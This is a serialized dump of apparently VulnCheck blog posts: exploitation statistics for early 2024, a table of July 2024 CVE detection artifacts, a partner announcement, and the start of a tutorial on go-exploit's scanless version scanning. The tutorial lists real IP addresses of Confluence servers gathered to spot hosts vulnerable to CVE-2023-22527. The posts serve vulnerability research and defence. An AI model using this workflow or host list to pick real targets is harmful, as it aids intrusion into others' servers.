Neurons",[341,68656,36929],{},[313,68658,68659,68662,68664,68666],{},[341,68660,68661],{},"CVE-2024-1708",[341,68663,68626],{},[341,68665,68629],{},[341,68667,850],{},[313,68669,68670,68673,68675,68678],{},[341,68671,68672],{},"CVE-2024-27198",[341,68674,54070],{},[341,68676,68677],{},"TeamCity",[341,68679,2837],{},[313,68681,68682,68684,68687,68690],{},[341,68683,22217],{},[341,68685,68686],{},"Atlassian",[341,68688,68689],{},"Confluence Server and Data Center",[341,68691,2837],{},[313,68693,68694,68697,68699,68702],{},[341,68695,68696],{},"CVE-2024-21412",[341,68698,3129],{},[341,68700,68701],{},"Windows",[341,68703,37766],{},[313,68705,68706,68708,68711,68714],{},[341,68707,1510],{},[341,68709,68710],{},"PHP Group",[341,68712,68713],{},"PHP",[341,68715,37766],{},[61,68717,68719],{"id":68718},"exploring-cisa-kev","Exploring CISA KEV",[18,68721,68722],{},[68,68723],{":width":10862,"alt":68560,"src":68724},"\u002Fblog\u002Fstate-of-exploitation-1h-2024\u002Fcisa-kev-1h-2024.png",[18,68726,68727],{},"During the first half of 2024, CISA added 73 vulnerabilities to the CISA KEV catalog, covering 33 software suppliers. Of these, 53 vulnerabilities had exploitation evidence captured in the VulnCheck KEV catalog before they were added to CISA KEV. Many of these were also disclosed by the vendor on the same day. Additionally, 16 of the 53 vulnerabilities had exploitation evidence dating back to before 2024.\nAs shown in the visual above, CISA KEV has primarily focused on widely adopted technologies, including internet-facing technologies, operating systems, and client-side software.",[61,68729,68731],{"id":68730},"zero-days","Zero Days",[18,68733,68734],{},"The term \"zero-day\" is often used in various ways across the security industry. 
For this research, we define a zero-day simply as a vulnerability for which evidence of exploitation in the wild is published on or before the vulnerability itself is publicly disclosed.",[18,68736,68365,68737,68739,68740,68745],{},[1373,68738,491],{}," of the Known Exploited Vulnerabilities (KEVs) added to the VulnCheck KEV catalog. In comparison, 130 zero-days were identified in 2023 which could mean we might see less in total during 2024. This could be due to multiple factors such as improvements in vulnerability disclosure timelines. Defenders should expect a relatively consistent number of zero-days, many of which are high-impact vulnerabilities affecting internet-facing network devices, web services, operating systems, and browsers.\nGoogle's ",[47,68741,68744],{"href":68742,"rel":68743},"https:\u002F\u002Fcloud.google.com\u002Fblog\u002Ftopics\u002Fthreat-intelligence\u002F2023-zero-day-trends",[51],"Zero Day Trends Report"," observed 97 zero-day vulnerabilities exploited in the wild, providing a comparative data point.",[993,68747,68749],{"id":68748},"comparing-zero-days-with-cisa-kev","Comparing Zero-days with CISA KEV",[18,68751,68752],{},"Notably, 33 of the 53 zero-days VulnCheck captured in the first half of 2024 were also added to the CISA KEV catalog, representing 45% of CISA KEV additions for 2024. These zero-days often involve major government suppliers such as Microsoft, Google, Apple, Citrix, Fortinet, Palo Alto Networks, Cisco, and CheckPoint, which typically disclose exploitation at the time of patch release and CVE issuance. 
It would be great to see more technology vendors disclosing when they have knowledge of exploitation.",[61,68754,68756],{"id":68755},"ransomware-botnets-oh-my","Ransomware & Botnets, Oh my",[18,68758,68759],{},[68,68760],{":width":10862,"alt":68560,"src":68761},"\u002Fblog\u002Fstate-of-exploitation-1h-2024\u002Fransomware-botnet-1h2024.png",[18,68763,68764],{},"Botnets and ransomware pose a significant risk to organizations due to their use of automated attack techniques that opportunistically target victims. During the first half of 2024, VulnCheck captured evidence of vulnerabilities being associated with ransomware and botnets for the first time. This included 30 vulnerabilities linked to ransomware and 46 vulnerabilities linked to botnets.",[61,68766,68768],{"id":68767},"weaponization-proof-of-concept-availability-associated-w-kevs","Weaponization & Proof-of-Concept Availability Associated w\u002F KEVs",[18,68770,68371],{},[18,68772,68773],{},"Regarding Proof-of-Concept (PoC) availability, 304 of the 390 Known Exploited Vulnerabilities (KEVs) had one or more PoCs available when this report was compiled. Among these, 273 (70%) had PoCs available prior to the disclosure of exploitation. It’s also worth considering the 53 zero-days, where POC or weaponization of a vulnerability is rare prior to disclosure. 
This underscores weaponization and PoC availability as a reliable indicator that a vulnerability is more likely to be exploited in the wild.",[18,68775,68776],{},[68,68777],{":width":10862,"alt":68560,"src":68778},"\u002Fblog\u002Fstate-of-exploitation-1h-2024\u002Fpoc-availability-1h2024.png",[18,68780,68781,68782,59],{},"Evidence of weaponization and PoC availability is useful when building out evidence-based prioritization using a framework such as Stakeholder-Specific Vulnerability Categorization.\nWe initially explored weaponization and PoC availability in our recent ",[47,68783,68785],{"href":44893,"rel":68784},[51],"state of exploitation article",[61,68787,19715],{"id":19714},[18,68789,68790],{},"[1] We continue to expand historical exploitation evidence for hundreds of CVEs from previous years in addition to the new evidence collected. From the time we cut off the data for this report, which was July 22, 2024, to the time of publication, we added over 100 new KEVs from multiple sources. Our priority remains providing broad and timely access to exploit intelligence.",[18,68792,68793],{},"[2] There is a bias towards Shadow Server during the first half of 2024 because we onboarded the source in November, which has trailed into January and February of this year. We expect Shadow Server to continue to be one of the leading sources to be the first to report known exploitation, but it’s likely their representation will be smaller during future periods.",[18,68795,68796],{},"[3] Analyzing past years' data, we observed that zero-days comprised 25% of all Known Exploited Vulnerabilities, as we noted in our previous report, which looked at 2014 to 2023. 
The lower percentage observed in the first half of 2024 is likely due to the short-term impact of onboarding ShadowServer as a new source of exploitation evidence.",[61,68798,202],{"id":201},[18,68800,205],{},[18,68802,208],{},[18,68804,211,68805,217],{},[47,68806,216],{"href":214,"rel":68807},[51],{"title":219,"searchDepth":220,"depth":220,"links":68809},[68810,68811,68815,68820,68821,68824,68825,68826,68827],{"id":68326,"depth":220,"text":68327},{"id":43092,"depth":220,"text":43093,"children":68812},[68813,68814],{"id":68341,"depth":1266,"text":68342},{"id":68359,"depth":1266,"text":68360},{"id":68377,"depth":220,"text":68378,"children":68816},[68817,68818,68819],{"id":68398,"depth":1266,"text":68399},{"id":68554,"depth":1266,"text":68555},{"id":68572,"depth":1266,"text":68573},{"id":68718,"depth":220,"text":68719},{"id":68730,"depth":220,"text":68731,"children":68822},[68823],{"id":68748,"depth":1266,"text":68749},{"id":68755,"depth":220,"text":68756},{"id":68767,"depth":220,"text":68768},{"id":19714,"depth":220,"text":19715},{"id":201,"depth":220,"text":202},"2024-08-05","A Look into the Last 6-months of Vulnerability Exploitation… January-June 2024",{"slug":68831},"state-of-exploitation-1h-2024","\u002Fblog\u002Fstate-of-exploitation-1h-2024",{"title":68280,"description":68829},"blog\u002Fstate-of-exploitation-1h-2024",[1280],"ZS4DxPP3TUtwVp5xD6z7yn_v2fPs-ntgwIl9yb6qODI",{"id":68838,"title":68839,"articles":7,"authors":68840,"body":68842,"date":69238,"description":69239,"extension":234,"image":7,"link":7,"meta":69240,"navigation":237,"path":69242,"seo":69243,"series":7,"stem":69244,"subtype":7,"tags":69245,"__hash__":69246},"blog\u002Fblog\u002Finitial-access-intelligence-july-2024.md","VulnCheck Initial Access Intelligence Update - July 2024",[68841],{"name":10,"avatar":11,"link":12,"linkName":13},{"type":15,"value":68843,"toc":69234},[68844,68847,68853,68856,68861,68864,68880,68884,69227,69229],[18,68845,68846],{},"VulnCheck Initial Access Intelligence 
equips organizations and security teams with detection artifacts such as Suricata signatures, YARA rules, PCAPs, and private exploit PoCs to defend against initial access vulnerabilities that are either already being exploited or likely to be exploited soon.",[18,68848,68849,68850,59],{},"Before we get into this month's details, it's worth mentioning that go-exploit, VulnCheck's exploit framework, now supports scanless asset detection and version scanning, using the exact same code for active scanning. You can learn more about that ",[47,68851,305],{"href":68852},"\u002Fblog\u002Fvulncheck-goes-scanless",[18,68854,68855],{},"In July 2024, VulnCheck crossed 250+ Initial Access Intelligence (IAI) artifacts, developing artifacts for 14 CVEs, covering 13 different vendors and 10 different products.",[18,68857,68858],{},[68,68859],{":width":10862,"alt":67495,"src":68860},"\u002Fblog\u002Finitial-access-intelligence-july-2024\u002Fvulncheck-initial-access-july.png",[18,68862,68863],{},"To provide better visibility into these updates, we’ve broken down July’s Initial Access Intelligence Artifacts by CVE. 
For each CVE, we provide a range of detection tools including:",[22,68865,68866,68868,68870,68872,68874,68876,68878],{},[25,68867,325],{},[25,68869,59440],{},[25,68871,59443],{},[25,68873,59446],{},[25,68875,59449],{},[25,68877,59452],{},[25,68879,64745],{},[61,68881,68883],{"id":68882},"july-2024-initial-access-artifacts","July 2024 Initial Access Artifacts",[307,68885,68886,68908],{},[310,68887,68888],{},[313,68889,68890,68892,68894,68896,68898,68900,68902,68904,68906],{},[316,68891,59471],{},[316,68893,59474],{},[316,68895,319],{},[316,68897,59479],{},[316,68899,59482],{},[316,68901,59485],{},[316,68903,59488],{},[316,68905,61654],{},[316,68907,61657],{},[336,68909,68910,68933,68956,68977,69000,69022,69043,69066,69089,69112,69135,69158,69181,69204],{},[313,68911,68912,68915,68918,68921,68923,68925,68927,68929,68931],{},[341,68913,68914],{},"Zyxel Customer-Provided Equipment Configuration Disclosure",[341,68916,68917],{},"2024-07-04",[341,68919,68920],{},"CVE-2023-28770",[341,68922,59510],{},[341,68924,59510],{},[341,68926,59510],{},[341,68928,59510],{},[341,68930,59510],{},[341,68932],{},[313,68934,68935,68938,68941,68944,68946,68948,68950,68952,68954],{},[341,68936,68937],{},"Apache Superset Session Forgery",[341,68939,68940],{},"2024-07-05",[341,68942,68943],{},"CVE-2023-27524",[341,68945,59510],{},[341,68947,59510],{},[341,68949,59510],{},[341,68951,59510],{},[341,68953,59510],{},[341,68955,59510],{},[313,68957,68958,68961,68963,68965,68967,68969,68971,68973,68975],{},[341,68959,68960],{},"GeoServer Remote Code Execution",[341,68962,68940],{},[341,68964,40178],{},[341,68966,59510],{},[341,68968],{},[341,68970,59510],{},[341,68972,59510],{},[341,68974,59510],{},[341,68976,59510],{},[313,68978,68979,68982,68985,68988,68990,68992,68994,68996,68998],{},[341,68980,68981],{},"Progress WhatsUp Gold Path 
Traversal",[341,68983,68984],{},"2024-07-12",[341,68986,68987],{},"CVE-2024-4885",[341,68989,59510],{},[341,68991],{},[341,68993,59510],{},[341,68995,59510],{},[341,68997,59510],{},[341,68999,59510],{},[313,69001,69002,69005,69007,69010,69012,69014,69016,69018,69020],{},[341,69003,69004],{},"Zyxel CPE Diag Command Injection",[341,69006,68984],{},[341,69008,69009],{},"CVE-2024-40890",[341,69011,59510],{},[341,69013,59510],{},[341,69015,59510],{},[341,69017,59510],{},[341,69019,59510],{},[341,69021],{},[313,69023,69024,69027,69029,69031,69033,69035,69037,69039,69041],{},[341,69025,69026],{},"Zyxel CPE Telnet Command Injection",[341,69028,68984],{},[341,69030,55362],{},[341,69032,59510],{},[341,69034,59510],{},[341,69036,59510],{},[341,69038,59510],{},[341,69040,59510],{},[341,69042],{},[313,69044,69045,69048,69051,69054,69056,69058,69060,69062,69064],{},[341,69046,69047],{},"Apache CloudStack Unsecured cluster API remote code execution",[341,69049,69050],{},"2024-07-15",[341,69052,69053],{},"CVE-2024-38346",[341,69055,59510],{},[341,69057,59510],{},[341,69059,59510],{},[341,69061,59510],{},[341,69063,59510],{},[341,69065,59510],{},[313,69067,69068,69071,69074,69077,69079,69081,69083,69085,69087],{},[341,69069,69070],{},"Laravel Credential leak in log files",[341,69072,69073],{},"2024-07-17",[341,69075,69076],{},"CVE-2024-29291",[341,69078,59510],{},[341,69080],{},[341,69082,59510],{},[341,69084,59510],{},[341,69086,59510],{},[341,69088,59510],{},[313,69090,69091,69094,69097,69100,69102,69104,69106,69108,69110],{},[341,69092,69093],{},"Zyxel Auth Bypass and pkg_init_cmd Command Injection",[341,69095,69096],{},"2024-07-19",[341,69098,69099],{},"CVE-2023-4473",[341,69101,59510],{},[341,69103,59510],{},[341,69105,59510],{},[341,69107,59510],{},[341,69109,59510],{},[341,69111],{},[313,69113,69114,69117,69120,69123,69125,69127,69129,69131,69133],{},[341,69115,69116],{},"Magento XXE Information 
Disclosure",[341,69118,69119],{},"2024-07-21",[341,69121,69122],{},"CVE-2024-34102",[341,69124,59510],{},[341,69126,59510],{},[341,69128,59510],{},[341,69130,59510],{},[341,69132,59510],{},[341,69134,59510],{},[313,69136,69137,69140,69143,69146,69148,69150,69152,69154,69156],{},[341,69138,69139],{},"H3C ERHMG2 Configuration\u002FPassword Leak",[341,69141,69142],{},"2024-07-22",[341,69144,69145],{},"CVE-2024-32238",[341,69147,59510],{},[341,69149],{},[341,69151,59510],{},[341,69153,59510],{},[341,69155,59510],{},[341,69157],{},[313,69159,69160,69163,69166,69169,69171,69173,69175,69177,69179],{},[341,69161,69162],{},"Elementor Essential Addons WordPress Plugin Authentication Bypass Remote Code Execution",[341,69164,69165],{},"2024-07-25",[341,69167,69168],{},"CVE-2023-32243",[341,69170,59510],{},[341,69172,59510],{},[341,69174,59510],{},[341,69176,59510],{},[341,69178,59510],{},[341,69180],{},[313,69182,69183,69186,69189,69192,69194,69196,69198,69200,69202],{},[341,69184,69185],{},"Ghostscript Filesystem Format String RCE",[341,69187,69188],{},"2024-07-30",[341,69190,69191],{},"CVE-2024-29510",[341,69193,59510],{},[341,69195],{},[341,69197],{},[341,69199],{},[341,69201],{},[341,69203,59510],{},[313,69205,69206,69209,69212,69215,69217,69219,69221,69223,69225],{},[341,69207,69208],{},"AJ-Report unauthenticated path-traversal Java evaluation RCE",[341,69210,69211],{},"2024-07-31",[341,69213,69214],{},"CVE-2024-7314",[341,69216,59510],{},[341,69218,59510],{},[341,69220,59510],{},[341,69222,59510],{},[341,69224,59510],{},[341,69226],{},[61,69228,59851],{"id":59850},[18,69230,59854,69231],{},[47,69232,59857],{"href":59857,"rel":69233},[51],{"title":219,"searchDepth":220,"depth":220,"links":69235},[69236,69237],{"id":68882,"depth":220,"text":68883},{"id":59850,"depth":220,"text":59851},"2024-08-01","In July 2024, we developed new Initial Access Intelligence (IAI) artifacts for 14 CVEs, covering 13 different vendors and 10 different 
products.",{"slug":69241},"initial-access-intelligence-july-2024","\u002Fblog\u002Finitial-access-intelligence-july-2024",{"title":68839,"description":69239},"blog\u002Finitial-access-intelligence-july-2024",[1281],"pSs_VvT1WdV2vLF9lW9UzvAUNAP8M8-mLxySPhZd2_A",{"id":69248,"title":69249,"articles":69250,"authors":69255,"body":69257,"date":69238,"description":69344,"extension":234,"image":7,"link":7,"meta":69345,"navigation":237,"path":69347,"seo":69348,"series":7,"stem":69349,"subtype":7,"tags":7,"__hash__":69350},"blog\u002Fblog\u002Fvulncheck-sevco.md","VulnCheck and Sevco - Real-time Threat Visibility and the Most Comprehensive Asset Intelligence",[69251],{"title":69252,"source":69253,"link":69254,"date":69238},"Sevco and VulnCheck Partner to Provide Customers a Powerful Combination of Real-time Threat Visibility and the Most Comprehensive Asset Intelligence","Business Wire","https:\u002F\u002Fwww.businesswire.com\u002Fnews\u002Fhome\u002F20240731216844\u002Fen\u002FSevco-and-VulnCheck-Partner-to-Provide-Customers-a-Powerful-Combination-of-Real-time-Threat-Visibility-and-the-Most-Comprehensive-Asset-Intelligence",[69256],{"name":32060,"avatar":32061,"link":33025,"linkName":32063},{"type":15,"value":69258,"toc":69342},[69259,69267,69270,69273,69279,69282,69285,69288,69299,69306,69309,69317,69320,69327,69330,69333],[18,69260,69261,69262,69266],{},"Today marks a very interesting day for VulnCheck - we are announcing our partnership with ",[47,69263,64381],{"href":69264,"rel":69265},"https:\u002F\u002Fsevcosecurity.com\u002F",[51],", provider of the industry’s most accurate real-time asset intelligence platform.",[18,69268,69269],{},"Sevco is a market leader. Through this collaboration, Sevco has  integrated VulnCheck data to roll out a significant set of enhancements to its existing vulnerability prioritization and exposure management capabilities. 
The integration of VulnCheck’s exploit and vulnerability intelligence with the Sevco platform offers organizations the most comprehensive visibility into their attack surface and software assets, empowering teams to quickly remediate potential vulnerabilities.",[18,69271,69272],{},"What’s New\nSevco gives teams comprehensive visibility into an organization’s attack surface and the assets in its IT environment. Their platform consolidates CVEs from the many sources that report them and uncovers environmental vulnerabilities to improve the efficacy of vulnerability management programs.",[18,69274,69275],{},[68,69276],{":width":10862,"alt":69277,"src":69278},"VulnCheck Sevco Product","\u002Fblog\u002Fvulncheck-sevco\u002Fvulncheck-sevco.png",[18,69280,69281],{},"This partnership and integration enable Sevco to enrich CVEs with VulnCheck data, providing teams with a complete view of vulnerabilities and their potential for weaponization or exploitation in the wild. Through enhancements to the Sevco Unified Vulnerability Dashboard, security teams now have real-time, deep contextual understanding of their vulnerability risks.",[18,69283,69284],{},"This is a big deal because Sevco is the first mover to leverage VulnCheck’s intelligence in the asset management segment of cybersecurity.",[18,69286,69287],{},"What are the core benefits customers can expect from this partnership?\nThe Sevco-VulnCheck partnership enables organizations to accelerate the maturity of their vulnerability management programs by providing the following foundational elements:",[22,69289,69290,69293,69296],{},[25,69291,69292],{},"Complete Asset Inventory – Sevco’s security asset inventory automatically provides security teams a complete and accurate view of devices – and the agents used to manage them – that is essential for understanding where vulnerabilities could be hiding.",[25,69294,69295],{},"Vulnerability Consolidation & Prioritization – Sevco consolidates vulnerabilities from any source that 
reports them into one platform, and VulnCheck provides the exploitation intelligence vulnerability management programs can use to triage and prioritize vulnerabilities.",[25,69297,69298],{},"Remediation, Validation and Reporting -- Sevco provides extensible asset data to combine business-related context with the vulnerability and exploit intelligence from VulnCheck to determine, act, and report on the risk specific to each organization.",[43656,69300,69303],{"author":69301,"position":69302},"Anthony Bettini","Founder and CEO",[18,69304,69305],{},"Enterprise systems have evolved to the point where security teams demand the fastest threat data to defeat adversaries and reduce risk. At the same time, effective vulnerability management requires a comprehensive and accurate asset inventory that is updated in real time. The combination of Sevco and VulnCheck enables enterprises to continuously discover and analyze across all assets to identify vulnerable conditions before an attacker can exploit them.",[18,69307,69308],{},"What’s truly unique about Sevco adding VulnCheck intelligence to its platform is that Sevco’s confidence in VulnCheck’s data was realized because other intelligence sources only cover a fraction of vulnerabilities in the wild, and lack critical information such as CVSS scores or Known Exploited Vulnerabilities (KEVs).",[18,69310,69311,69312,69316],{},"In just two sources as part of a larger collection of vulnerability intelligence sources, which are available to anyone in ",[47,69313,69315],{"href":40745,"rel":69314},[51],"VulnCheck’s Community Tier",", VulnCheck covers over 80% more exploited vulnerabilities in the wild than the CISA KEV, and on average notifies users 27 days earlier than CISA and 14 days faster than NIST NVD.",[18,69318,69319],{},"VulnCheck maintains over 300 million unique data points from 420+ sources on ALL CVE’s, making it the only game in town for product builders to autonomously enrich the aggregated and deduplicated 
vulnerabilities like they do in the Sevco platform. So this is a big deal because now VulnCheck is paired with asset data, and understanding where software packages are vulnerable when there are likely apps that many organizations are blind to - is well, huge!",[43656,69321,69324],{"author":69322,"position":69323},"J.J. Guy","Co-Founder and CEO",[18,69325,69326],{},"With the exploitation of vulnerabilities increasing 180% over the past year, organizations must mature their vulnerability management programs as a strategic priority. Our partnership with VulnCheck enables us to significantly build on the vulnerability hunting capabilities in the Sevco platform by adding the most complete exploit intelligence on the market. The combination gives security teams the only real-time threat visibility for software assets, enabling them to act faster and smarter in remediating vulnerabilities.",[18,69328,69329],{},"We are thrilled to reconnect with some old friends at Sevco who have put together a great offering and a great organization. It's also been great to work with the Sevco team, and make some new friends along the way!!",[18,69331,69332],{},"If you’re interested in learning more about the integration, we’ll be teaming up with Sevco to demonstrate the new capabilities at Black Hat USA next week. Stop by Startup City stand 220 to see how these enhancements can benefit your organization.",[18,69334,69335,69336,69341],{},"Plus, Sevco is a sponsor of VulnCheck’s Security Wasteland 2024. ",[47,69337,69340],{"href":69338,"rel":69339},"https:\u002F\u002Fwwv.vulncheck.com\u002Fsecurity-wasteland-black-hat-2024?utm_source=vulncheck",[51],"You should register"," if you haven’t!!! Let’s go!",{"title":219,"searchDepth":220,"depth":220,"links":69343},[],"Sevco is a market leader. 
Through this collaboration, Sevco has integrated VulnCheck data to roll out a significant set of enhancements to its existing vulnerability prioritization and exposure management capabilities.",{"slug":69346},"vulncheck-sevco","\u002Fblog\u002Fvulncheck-sevco",{"title":69249,"description":69344},"blog\u002Fvulncheck-sevco","IT4GiM90FkMKWdhvEeBT8IYRwrPULgGVO-pezCwTKJY",{"id":69352,"title":69353,"articles":7,"authors":69354,"body":69356,"date":69165,"description":71595,"extension":234,"image":7,"link":7,"meta":71596,"navigation":237,"path":68852,"seo":71598,"series":7,"stem":71599,"subtype":7,"tags":71600,"__hash__":71601},"blog\u002Fblog\u002Fvulncheck-goes-scanless.md","VulnCheck go-exploit Goes Scanless",[69355],{"name":10391,"avatar":10392,"link":10393,"linkName":10394},{"type":15,"value":69357,"toc":71588},[69358,69364,69372,69386,69392,69406,69410,69424,69525,69532,69734,69738,69750,69754,69761,70065,70071,70165,70169,70182,70249,70252,70322,70325,70638,70641,70645,70648,70656,70663,71028,71031,71101,71104,71202,71205,71574,71585],[18,69359,69360,69363],{},[47,69361,20558],{"href":14297,"rel":69362},[51]," is VulnCheck’s open-source exploit development framework. Besides exploitation and c2 primitives, the framework features built-in asset detection and version scanning capabilities. A recent update to go-exploit allows for the exploits to share information across runs. This makes go-exploit the only exploit framework to scan HTTP targets without ever connecting to them!",[18,69365,69366,69367,69371],{},"The security industry puts a lot of effort into internet scanning. Our friends over at GreyNoise track almost ",[47,69368,48221],{"href":69369,"rel":69370},"https:\u002F\u002Fviz.greynoise.io\u002Ftags",[51]," different industry “actors” that scan the internet. There are countless others that stand up their own Tenable, Nuclei, Metasploit, etc. and scan, without attribution, from Amazon, Digital Ocean, and more. 
go-exploit was always intended to fall within this mass-scanning category too.",[18,69373,69374,69375,69379,69380,69385],{},"But now, go-exploit, using the exact same code for active scanning, supports scanless asset detection and version scanning. To see how that works, let’s find all the internet-facing Atlassian Confluence servers vulnerable to ",[47,69376,22217],{"href":69377,"rel":69378},"https:\u002F\u002Fapi.vulncheck.com\u002Fv3\u002Findex\u002Fvulncheck-kev?cve=CVE-2023-22527",[51],". To start, let’s say we agree on this ",[47,69381,69384],{"href":69382,"rel":69383},"https:\u002F\u002Fwww.shodan.io\u002Fsearch?query=%2Bhttp.favicon.hash%3A-305179312+%22X-Confluence-Request-Time%22+%2B%22Set-Cookie%3A+JSESSIONID%3D%22+%2Bhtml%3A%22confluence-context-path%22",[51],"Shodan query"," for Confluence.",[18,69387,69388],{},[68,69389],{":width":10862,"alt":69390,"src":69391},"Confluence on Shodan","\u002Fblog\u002Fvulncheck-goes-scanless\u002Fshodan-confluence.png",[18,69393,69394,69395,69400,69401,69405],{},"How can we quickly determine which servers in the query are vulnerable? Tenable Nessus has a ",[47,69396,69399],{"href":69397,"rel":69398},"https:\u002F\u002Fwww.tenable.com\u002Fplugins\u002Fnessus\u002F188068",[51],"version scanner"," for this CVE, but the thought of configuring Nessus and scanning thousands of hosts is about as appealing as lying in a coffin full of scorpions. Nuclei has a ",[47,69402,30296],{"href":69403,"rel":69404},"https:\u002F\u002Fgithub.com\u002Fprojectdiscovery\u002Fnuclei-templates\u002Fblob\u002F37cb7a57f8521350b96a4accfcb87513dbb1ff1b\u002Fhttp\u002Fcves\u002F2023\u002FCVE-2023-22527.yaml",[51],"! But running it against internet-hosts is bordering on a criminal act. 
Scanless go-exploit sounds downright pleasant compared to those two.",[61,69407,69409],{"id":69408},"step-1-convert-a-shodan-query-into-a-database","Step 1: Convert a Shodan Query into a Database",[18,69411,69412,69413,69418,69419,69423],{},"Our first step is to convert the Shodan query into something go-exploit can understand. ",[47,69414,69417],{"href":69415,"rel":69416},"https:\u002F\u002Fgithub.com\u002Fvulncheck-oss\u002Fgo-exploit-cache",[51],"go-exploit-cache"," can convert a Shodan gzip file into a go-exploit database. All we have to do is download the data from Shodan and pass it to go-exploit-cache. We’ve provided a sample of that data ",[47,69420,305],{"href":69421,"rel":69422},"https:\u002F\u002Fgithub.com\u002Fvulncheck-oss\u002Fgo-exploit-cache\u002Fblob\u002Fmain\u002Ftest\u002Ftestdata\u002Fshodan-confluence.json.gz",[51],", and you can use it with go-exploit-cache like so:",[1354,69425,69427],{"className":31740,"code":69426,"language":2186,"meta":219,"style":219},"albinolobster@mournland:~\u002Fgo-exploit-cache$ .\u002Fbuild\u002Fgo-exploit-cache -type shodan-gzip -in .\u002Ftest\u002Ftestdata\u002Fshodan-confluence.json.gz -out confluence.db\n2024\u002F07\u002F19 14:37:36 Decompressing the Shodan GZIP... 
this can be slow\n2024\u002F07\u002F19 14:37:37 Decompressed file written to .tmp\u002Fshodan.json\n2024\u002F07\u002F19 14:37:37 Generating database entries...\nalbinolobster@mournland:~\u002Fgo-exploit-cache$\n",[886,69428,69429,69455,69485,69505,69520],{"__ignoreMap":219},[1373,69430,69431,69434,69437,69440,69443,69446,69449,69452],{"class":1375,"line":1376},[1373,69432,69433],{"class":2206},"albinolobster@mournland:~\u002Fgo-exploit-cache$",[1373,69435,69436],{"class":1391}," .\u002Fbuild\u002Fgo-exploit-cache",[1373,69438,69439],{"class":2209}," -type",[1373,69441,69442],{"class":1391}," shodan-gzip",[1373,69444,69445],{"class":2209}," -in",[1373,69447,69448],{"class":1391}," .\u002Ftest\u002Ftestdata\u002Fshodan-confluence.json.gz",[1373,69450,69451],{"class":2209}," -out",[1373,69453,69454],{"class":1391}," confluence.db\n",[1373,69456,69457,69460,69463,69466,69468,69471,69474,69477,69479,69482],{"class":1375,"line":220},[1373,69458,69459],{"class":2206},"2024\u002F07\u002F19",[1373,69461,69462],{"class":1391}," 14:37:36",[1373,69464,69465],{"class":1391}," Decompressing",[1373,69467,57354],{"class":1391},[1373,69469,69470],{"class":1391}," Shodan",[1373,69472,69473],{"class":1391}," GZIP...",[1373,69475,69476],{"class":1391}," this",[1373,69478,39106],{"class":1391},[1373,69480,69481],{"class":1391}," be",[1373,69483,69484],{"class":1391}," slow\n",[1373,69486,69487,69489,69492,69495,69497,69500,69502],{"class":1375,"line":1266},[1373,69488,69459],{"class":2206},[1373,69490,69491],{"class":1391}," 14:37:37",[1373,69493,69494],{"class":1391}," Decompressed",[1373,69496,8738],{"class":1391},[1373,69498,69499],{"class":1391}," written",[1373,69501,55503],{"class":1391},[1373,69503,69504],{"class":1391}," .tmp\u002Fshodan.json\n",[1373,69506,69507,69509,69511,69514,69517],{"class":1375,"line":1852},[1373,69508,69459],{"class":2206},[1373,69510,69491],{"class":1391},[1373,69512,69513],{"class":1391}," Generating",[1373,69515,69516],{"class":1391}," 
database",[1373,69518,69519],{"class":1391}," entries...\n",[1373,69521,69522],{"class":1375,"line":4692},[1373,69523,69524],{"class":2206},"albinolobster@mournland:~\u002Fgo-exploit-cache$\n",[18,69526,69527,69528,69531],{},"go-exploit-cache produces an sqlite database that is consumable by go-exploit. If you open up the database, you can find the cached HTTP responses in the ",[886,69529,69530],{},"http_cache"," table:",[1354,69533,69535],{"className":31740,"code":69534,"language":2186,"meta":219,"style":219},"albinolobster@mournland:~\u002Fgo-exploit-cache$ sqlite3 confluence.db\nSQLite version 3.31.1 2020-01-27 19:55:54\nEnter \".help\" for usage hints.\nsqlite> select rhost,rport from http_cache limit 10;\n52.207.194.59|80\n52.200.210.54|80\n135.181.36.116|443\n122.152.230.161|8090\n31.148.148.9|443\n65.203.128.117|8443\n85.184.249.239|443\n129.241.14.197|443\n158.160.120.182|443\n52.34.139.174|443\nsqlite> select count(*) from http_cache;\n2313\nsqlite>\n",[886,69536,69537,69546,69562,69581,69606,69616,69625,69635,69645,69654,69664,69673,69682,69691,69700,69723,69728],{"__ignoreMap":219},[1373,69538,69539,69541,69544],{"class":1375,"line":1376},[1373,69540,69433],{"class":2206},[1373,69542,69543],{"class":1391}," sqlite3",[1373,69545,69454],{"class":1391},[1373,69547,69548,69551,69553,69556,69559],{"class":1375,"line":220},[1373,69549,69550],{"class":2206},"SQLite",[1373,69552,45880],{"class":1391},[1373,69554,69555],{"class":5467}," 3.31.1",[1373,69557,69558],{"class":1391}," 2020-01-27",[1373,69560,69561],{"class":1391}," 19:55:54\n",[1373,69563,69564,69566,69568,69571,69573,69575,69578],{"class":1375,"line":1266},[1373,69565,55798],{"class":2206},[1373,69567,4883],{"class":1387},[1373,69569,69570],{"class":1391},".help",[1373,69572,183],{"class":1387},[1373,69574,55807],{"class":1391},[1373,69576,69577],{"class":1391}," usage",[1373,69579,69580],{"class":1391}," 
hints.\n",[1373,69582,69583,69586,69589,69591,69594,69596,69599,69602,69604],{"class":1375,"line":1852},[1373,69584,69585],{"class":2206},"sqlite",[1373,69587,69588],{"class":4640},"> ",[1373,69590,49878],{"class":1391},[1373,69592,69593],{"class":1391}," rhost,rport",[1373,69595,67067],{"class":1391},[1373,69597,69598],{"class":1391}," http_cache",[1373,69600,69601],{"class":1391}," limit",[1373,69603,39673],{"class":5467},[1373,69605,4912],{"class":1383},[1373,69607,69608,69611,69613],{"class":1375,"line":4692},[1373,69609,69610],{"class":2206},"52.207.194.59",[1373,69612,17472],{"class":1397},[1373,69614,69615],{"class":2206},"80\n",[1373,69617,69618,69621,69623],{"class":1375,"line":4724},[1373,69619,69620],{"class":2206},"52.200.210.54",[1373,69622,17472],{"class":1397},[1373,69624,69615],{"class":2206},[1373,69626,69627,69630,69632],{"class":1375,"line":4756},[1373,69628,69629],{"class":2206},"135.181.36.116",[1373,69631,17472],{"class":1397},[1373,69633,69634],{"class":2206},"443\n",[1373,69636,69637,69640,69642],{"class":1375,"line":4768},[1373,69638,69639],{"class":2206},"122.152.230.161",[1373,69641,17472],{"class":1397},[1373,69643,69644],{"class":2206},"8090\n",[1373,69646,69647,69650,69652],{"class":1375,"line":4792},[1373,69648,69649],{"class":2206},"31.148.148.9",[1373,69651,17472],{"class":1397},[1373,69653,69634],{"class":2206},[1373,69655,69656,69659,69661],{"class":1375,"line":4798},[1373,69657,69658],{"class":2206},"65.203.128.117",[1373,69660,17472],{"class":1397},[1373,69662,69663],{"class":2206},"8443\n",[1373,69665,69666,69669,69671],{"class":1375,"line":4806},[1373,69667,69668],{"class":2206},"85.184.249.239",[1373,69670,17472],{"class":1397},[1373,69672,69634],{"class":2206},[1373,69674,696